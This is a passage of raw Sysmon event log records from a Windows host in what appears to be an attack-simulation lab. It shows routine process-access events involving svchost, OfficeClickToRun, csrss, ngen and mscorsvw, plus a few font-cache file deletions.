Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.514{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.499{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.483{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.483{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.452{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.436{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-125.datMD5=2FE361FFA1DBB30E961C7B9A9CA4E690,SHA256=0E00F9CACA3ABBD9C31EAB2BC9828EC7470FFB1FEBB584DABC5B861C17BD973F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.436{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.421{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.405{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.389{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.374{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.374{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDC-607E-D70C-00000000BB01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.358{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.342{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.327{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.327{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDC-607E-D70C-00000000BB01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.327{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDC-607E-D70C-00000000BB01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.327{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.311{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-1.datMD5=BD02FEF9CFFAB42CCFC63F91D98B7B4A,SHA256=30EAF0D8712A1155FC387A3BB668573ABF53E167110315522CFA23D595493FA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.296{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.296{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.264{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.249{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDC-607E-D60C-00000000BB01}5924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.233{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.217{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.217{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.202{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDC-607E-D60C-00000000BB01}5924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.202{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDC-607E-D60C-00000000BB01}5924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.202{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.186{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-859.datMD5=91BE40368CA8F45C5504F375F392A1BD,SHA256=A00F0A3387C1693AAC9E97924F3B626210298E2D2153EC46ACDF5DD9C2CB86B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.186{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.171{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.155{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.124{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.108{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.092{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.061{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft 